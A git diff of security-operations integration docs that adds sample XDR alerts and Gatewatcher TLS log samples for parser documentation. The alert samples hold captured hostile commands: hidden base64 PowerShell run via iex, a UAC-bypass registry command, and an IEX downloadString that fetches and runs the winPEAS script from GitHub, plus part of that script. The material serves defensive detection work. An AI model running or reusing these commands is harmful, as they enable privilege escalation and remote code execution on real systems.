"parentFileHashSha256", + "value": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 9, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 10, + "type": "file_sha256", + "field": "parentFileHashSha256", + "value": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 11, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 12, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 13, + "type": "fullpath", + "field": "parentFilePath", + "value": "C:\\Windows\\System32\\cmd.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 14, + "type": "fullpath", + "field": "objectName", + "value": "C:\\Windows\\System32\\gpresult.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 15, + "type": "fullpath", + "field": "parentFilePath", + "value": "C:\\Windows\\System32\\cmd.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 16, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 17, + "type": "fullpath", + "field": "objectName", + "value": "C:\\Windows\\System32\\gpresult.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 18, + "type": "host", + "field": "", + "value": { + "guid": "", + "name": "99.255.12.39", + "ips": [ + "99.255.12.39" + ] + }, + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [], + "provenance": [ + "Lateral Movement Enrichment" + ] + }, + { + "id": 19, + "type": "process_id", + "field": "objectPid", + "value": "5552", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 20, + "type": "user_account", + "field": "", + "value": "systel.support", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [], + "provenance": [ + "Related Asset Enrichment" + ] + }, + { + "id": 21, + "type": "user_account", + "field": "", + "value": "srv-serveur", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [], + "provenance": [ + "Related Asset Enrichment" + ] + }, + { + "id": 22, + "type": "user_account", + "field": "", + "value": "daqsan.support", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [], + "provenance": [ + "Related Asset Enrichment" + ] + } + ] + } + ``` + + + +=== "test_registry" + + + ```json + { + "schemaVersion": "1.12", + "id": "WB-9002-20220906-00022", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://THE_WORKBENCH_URL", + "alertProvider": "SAE", + "modelId": "1ebd4f91-4b28-40b4-87f5-8defee4791d8", + "model": "Privilege Escalation via UAC Bypass", + "modelType": "preset", + "score": 64, + "severity": "high", + "firstInvestigatedDateTime": "2022-10-06T02:30:31Z", + "createdDateTime": "2022-09-06T02:49:31Z", + "updatedDateTime": "2022-09-06T02:49:48Z", + "incidentId": "IC-1-20230706-00001", + "caseId": "CL-1-20230706-00001", + "ownerIds": [ + "12345678-1234-1234-1234-123456789012" + ], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 1, + "containerCount": 1, + "cloudIdentityCount": 1, + "entities": [ + { + "entityType": "account", + "entityValue": "shockwave\\sam", + "entityId": "shockwave\\sam", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "name": "nimda", + "ips": [ + "10.10.58.51" + ] + }, + "entityId": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "managementScopeGroupId": "deadbeef-292e-42ae-86be-d2fef483a248", + "managementScopeInstanceId": "1babc299-52de-44f4-a1d2-8a224f391eee", + "managementScopePartitionKey": "4c1850c0-8a2a-4637-9f88-6afbab54dd79", + "relatedEntities": [ + "shockwave\\sam" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8 + ], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "emailAddress", + "entityValue": "support@pctutordetroit.com", + "entityId": "SUPPORT@PCTUTORDETROIT.COM", + "relatedEntities": [], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "container", + "entityValue": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0", + "entityId": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "relatedEntities": [], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "cloudIdentity", + "entityValue": "arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung", + "entityId": "arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung", + "relatedEntities": [], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + } + ] + }, + "description": "A user bypassed User Account Control (UAC) to gain higher-level permissions.", + "matchedRules": [ + { + "id": "25d96e5d-cb69-4935-ae27-43cc0cdca1cc", + "name": "(T1088) Bypass UAC via shell open registry", + "matchedFilters": [ + { + "id": "ac200e74-8309-463e-ad6b-a4c16a3a377f", + "name": "Bypass UAC Via Shell Open Default Registry", + "matchedDateTime": "2022-09-05T03:53:49.802Z", + "mitreTechniqueIds": [ + "T1112", + "V9.T1112", + "V9.T1548.002" + ], + "matchedEvents": [ + { + "uuid": "a32599b7-c0c9-45ed-97bf-f2be7679fb00", + "matchedDateTime": "2022-09-05T03:53:49.802Z", + "type": "TELEMETRY_REGISTRY" + } + ] + }, + { + "id": "857b6396-da29-44a8-bc11-25298e646795", + "name": "Bypass UAC Via Shell Open Registry", + "matchedDateTime": "2022-09-05T03:53:49.802Z", + "mitreTechniqueIds": [ + "T1112", + "T1088", + "V9.T1112", + "V9.T1548.002" + ], + "matchedEvents": [ + { + "uuid": "4c456bbb-2dfc-40a5-b298-799a0ccefc01", + "matchedDateTime": "2022-09-05T03:53:49.802Z", + "type": "TELEMETRY_REGISTRY" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "processCmd", + "value": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "ac200e74-8309-463e-ad6b-a4c16a3a377f" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; ", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "ac200e74-8309-463e-ad6b-a4c16a3a377f" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "processCmd", + "value": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "857b6396-da29-44a8-bc11-25298e646795" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; ", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "857b6396-da29-44a8-bc11-25298e646795" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "registry_key", + "field": "objectRegistryKeyHandle", + "value": "hkcr\\ms-settings\\shell\\open\\command", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "ac200e74-8309-463e-ad6b-a4c16a3a377f" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "registry_key", + "field": "objectRegistryKeyHandle", + "value": "hkcr\\ms-settings\\shell\\open\\command", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "857b6396-da29-44a8-bc11-25298e646795" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "registry_value", + "field": "objectRegistryValue", + "value": "delegateexecute", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "857b6396-da29-44a8-bc11-25298e646795" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 8, + "type": "registry_value_data", + "field": "objectRegistryData", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "ac200e74-8309-463e-ad6b-a4c16a3a377f" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + +=== "test_service_abuse" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000", + "alertProvider": "SAE", + "modelId": "ce2af827-6dfc-4c5b-ab40-ab4b82351c83", + "model": "Possible Web Service Abuse", + "modelType": "preset", + "score": 39, + "severity": "medium", + "createdDateTime": "2024-11-26T16:45:28Z", + "updatedDateTime": "2024-11-26T16:45:28Z", + "ownerIds": [], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "windows10\\jdoe", + "entityId": "windows10\\jdoe", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "e930412e-e09c-454b-a508-576ba266b9d8", + "name": "windows10", + "ips": [ + "20.193.45.33" + ] + }, + "entityId": "e930412e-e09c-454b-a508-576ba266b9d8", + "relatedEntities": [ + "windows10\\jdoe" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8, + 9 + ], + "provenance": [ + "Alert" + ], + "managementScopeGroupId": "ce9c7ad6-f895-4907-bf57-e34b59d4dc90" + } + ] + }, + "description": "The adversary attempted to download a payload stored on a legitimate external web service.", + "matchedRules": [ + { + "id": "ef13e37e-148e-48d6-819f-021f4acfcace", + "name": "Suspicious Powershell Connection To Web Service", + "matchedFilters": [ + { + "id": "97e70752-3b27-4db0-b840-507d3f37ffe6", + "name": "Suspicious Powershell Connection To Web Service - Variant 2", + "matchedDateTime": "2024-11-26T16:42:29.602Z", + "mitreTechniqueIds": [ + "T1102" + ], + "matchedEvents": [ + { + "uuid": "4aed361f-de80-4679-bf18-608b2afe5ff7", + "matchedDateTime": "2024-11-26T16:42:29.602Z", + "type": "TELEMETRY_AMSI" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "amsi_rawDataStr", + "field": "objectRawDataStr", + "value": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "amsi_rawDataStr", + "field": "objectRawDataStr", + "value": "<#\n.SYNOPSIS\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\n.DESCRIPTION\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\n.EXAMPLE\n # Default - normal operation with username/password audit in drives/registry\n .\\winPeas.ps1\n\n # Include Excel files in search: .xls, .xlsx, .xlsm\n .\\winPeas.ps1 -Excel\n\n # Full audit - normal operation with APIs / Keys / Tokens\n ## This will produce false positives ## \n .\\winPeas.ps1 -FullCheck \n\n # Add Time stamps to each command\n .\\winPeas.ps1 -TimeStamp\n\n.NOTES\n Version: 1.3\n PEASS-ng Original Author: PEASS-ng\n winPEAS.ps1 Author: @RandolphConley\n Creation Date: 10/4/2022\n Website: https://github.com/peass-ng/PEASS-ng\n\n TESTED: PoSh 5,7\n UNTESTED: PoSh 3,4\n NOT FULLY COMPATIBLE: PoSh 2 or lower\n#>\n\n######################## FUNCTIONS ########################\n\n[CmdletBinding()]\nparam(\n [switch]$TimeStamp,\n [switch]$FullCheck,\n [switch]$Excel\n)\n\n# Gather KB from all patches installed\nfunction returnHotFixID {\n param(\n [string]$title\n )\n # Match on KB or if patch does not have a KB, return end result\n if (($title | Select-String -AllMatches -Pattern 'KB(\\d{4,6})').Matches.Value) {\n return (($title | Select-String -AllMatches -Pattern 'KB(\\d{4,6})').Matches.Value)\n }\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\d{4,6})').Matches.Value) {\n return (($title | Select-String -NotMatch -Pattern 'KB(\\d{4,6})').Matches.Value)\n }\n}\n\nFunction Start-ACLCheck {\n param(\n $Target, $ServiceName)\n # Gather ACL of object\n if ($null -ne $target) {\n try {\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\n }\n catch { $null }\n \n # If Found, Evaluate Permissions\n if ($ACLObject) { \n $Identity = @()\n $Identity += \"$env:COMPUTERNAME\\$env:USERNAME\"\n if ($ACLObject.Owner -like $Identity ) { Write-Host \"$Identity has ownership of $Target\" -ForegroundColor Red }\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \"group name\" to the first column.\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\n $IdentityFound = $false\n foreach ($i in $Identity) {\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\n $UserPermission = \"\"\n switch -WildCard ($Permission.FileSystemRights) {\n \"FullControl\" { $userPermission = \"FullControl\"; $IdentityFound = $true }\n \"Write*\" { $userPermission = \"Write\"; $IdentityFound = $true }\n \"Modify\" { $userPermission = \"Modify\"; $IdentityFound = $true }\n }\n Switch ($permission.RegistryRights) {\n \"FullControl\" { $userPermission = \"FullControl\"; $IdentityFound = $true }\n }\n if ($UserPermission) {\n if ($ServiceName) { Write-Host \"$ServiceName found with permissions issue:\" -ForegroundColor Red }\n Write-Host -ForegroundColor red \"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\"\n }\n } \n # Identity Found Check - If False, loop through and stop at root of drive\n if ($IdentityFound -eq $false) {\n if ($Target.Length -gt 3) {\n $Target = Split-Path $Target\n Start-ACLCheck $Target -ServiceName $ServiceName\n }\n }\n }\n else {\n # If not found, split path one level and Check again\n $Target = Split-Path $Target\n Start-ACLCheck $Target $ServiceName\n }\n }\n}\n\nFunction UnquotedServicePathCheck {\n Write-Host \"Fetching the list of services, this may take a while...\";\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \"`\"\" -and $_.PathName -inotmatch \":\\\\Windows\\\\\" -and ($_.StartMode -eq \"Auto\" -or $_.StartMode -eq \"Manual\") -and ($_.State -eq \"Running\" -or $_.State -eq \"Stopped\") };\n if ($($services | Measure-Object).Count -lt 1) {\n Write-Host \"No unquoted service paths were found\";\n }\n else {\n $services | ForEach-Object {\n Write-Host \"Unquoted Service Path found!\" -ForegroundColor red\n Write-Host Name: $_.Name\n Write-Host PathName: $_.PathName\n Write-Host StartName: $_.StartName \n Write-Host StartMode: $_.StartMode\n Write-Host Running: $_.State\n } \n }\n}\n\nfunction TimeElapsed { Write-Host \"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\" }\nFunction Get-ClipBoardText {\n Add-Type -AssemblyName PresentationCore\n $text = [Windows.Clipboard]::GetText()\n if ($text) {\n Write-Host \"\"\n if ($TimeStamp) { TimeElapsed }\n Write-Host -ForegroundColor Blue \"=========|| ClipBoard text found:\"\n Write-Host $text\n \n }\n}\n\nFunction Search-Excel {\n [cmdletbinding()]\n Param (\n [parameter(Mandatory, ValueFromPipeline)]\n [ValidateScript({\n Try {\n If (Test-Path -Path $_) {$True}\n ", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "processCmd", + "value": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\Explorer.EXE", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "process_id", + "field": "processPid", + "value": "5040", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 8, + "type": "process_id", + "field": "parentPid", + "value": "9920", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 9, + "type": "text", + "field": "endpointHostName", + "value": "Windows10", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md index 29ea902ba..0a1affd16 100644 --- a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md +++ b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md @@ -41,7 +41,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", @@ -98,7 +98,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "module": "dga", "severity": 1 }, - "@timestamp": "2023-03-22T10:46:08.487000Z", + "@timestamp": "2023-03-22T10:25:54.903000Z", "destination": { "address": "pgoadcmgqfacj.com", "domain": "pgoadcmgqfacj.com", @@ -158,7 +158,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2023-03-22T10:53:13.408000Z", + "@timestamp": "2023-03-22T10:35:22.615000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", @@ -263,7 +263,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "module": "retrohunt", "severity": 1 }, - "@timestamp": "2023-06-12T10:12:39.001000Z", + "@timestamp": "2023-06-09T14:08:46.845000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", @@ -370,7 +370,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "module": "alert", "severity": 1 }, - "@timestamp": "2023-03-22T10:44:08.001000Z", + "@timestamp": "2023-03-22T10:25:55.690000Z", "destination": { "address": "2.2.2.2", "bytes": 90364, @@ -454,7 +454,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ], "module": "fileinfo" }, - "@timestamp": "2023-03-22T10:44:07.998000Z", + "@timestamp": "2023-03-22T10:25:55.469000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", @@ -551,7 +551,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ], "module": "http" }, - "@timestamp": "2023-03-22T10:44:07.997000Z", + "@timestamp": "2023-03-22T10:25:55.377000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", @@ -626,6 +626,71 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "sigflow-tls.json" + + ```json + + { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", + "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } + + ``` + + @@ -728,7 +793,9 @@ The following table lists the fields that are extracted, normalized under the EC |`gatewatcher.timestamp_detected` | `keyword` | Timestamp of the file collection by gcap | |`gatewatcher.timestamp_package` | `text` | This field is used for retrohunt alerts | |`gatewatcher.tlp` | `text` | This field is used for retrohunt alerts | -|`gatewatcher.tls` | `text` | This field represents the tls field in a network metadata (used in legacy format log) | +|`gatewatcher.tls` | `text` | This field contains all TLS data fields in a TLS metadata | +|`gatewatcher.tls_fingerprint` | `text` | This field represents the TLS server fingerprint field in a TLS metadata | +|`gatewatcher.tls_sni` | `text` | This field represents the TLS SNI field in a TLS metadata | |`gatewatcher.ttp` | `text` | This field is used for retrohunt alerts | |`gatewatcher.type` | `keyword` | Type of analysis | |`gatewatcher.usage_mode` | `text` | This field is used for retrohunt alerts | @@ -751,6 +818,13 @@ The following table lists the fields that are extracted, normalized under the EC |`source.ip` | `ip` | IP address of the source. | |`source.packets` | `long` | Packets sent from the source to the destination. | |`source.port` | `long` | Port of the source. | +|`tls.server.certificate_chain` | `keyword` | Array of PEM-encoded certificates that make up the certificate chain offered by the server. | +|`tls.server.issuer` | `keyword` | Subject of the issuer of the x.509 certificate presented by the server. | +|`tls.server.ja3s` | `keyword` | A hash that identifies servers based on how they perform an SSL/TLS handshake. | +|`tls.server.not_after` | `date` | Timestamp indicating when server certificate is no longer considered valid. | +|`tls.server.not_before` | `date` | Timestamp indicating when server certificate is first considered valid. | +|`tls.server.subject` | `keyword` | Subject of the x.509 certificate presented by the server. | +|`tls.version` | `keyword` | Numeric part of the version parsed from the original string. | |`url.domain` | `keyword` | Domain of the url. | |`url.path` | `wildcard` | Path of the request, such as "/search". | |`user_agent.original` | `keyword` | Unparsed user_agent string. | diff --git a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26_sample.md b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26_sample.md index d5d468994..2b6773540 100644 --- a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26_sample.md +++ b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26_sample.md @@ -536,3 +536,42 @@ In this section, you will find examples of raw logs as generated natively by the +=== "sigflow-tls" + + + ```json + { + "uuid": "b96777f9-6409-4864-b8a1-452094a93c5d", + "host": "gcap-xxxxxxxxx.domain.local", + "ether": { + "dest_mac": "e6:43:7e:91:1b:92", + "src_mac": "82:df:ee:4f:81:af" + }, + "type": "suricata", + "dest_ip": "5.6.7.8", + "src_port": 64809, + "flow_id": 1366008699485799, + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "timestamp": "2024-11-21T13:02:02.870913+0000", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "event_type": "tls", + "src_ip": "1.2.3.4", + "dest_port": 443, + "in_iface": "mon2", + "tls": { + "sni": "www.microsoft.com", + "version": "TLS 1.3", + "ja3s": { + "string": "771,4866,43-51", + "hash": "15af977ce25de452b96affa2addb1036" + } + }, + "@version": "1", + "proto": "TCP", + "gcap": "gcap-xxxxxxxxx.domain.local", + "@timestamp": "2024-11-21T13:02:44.291Z" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md 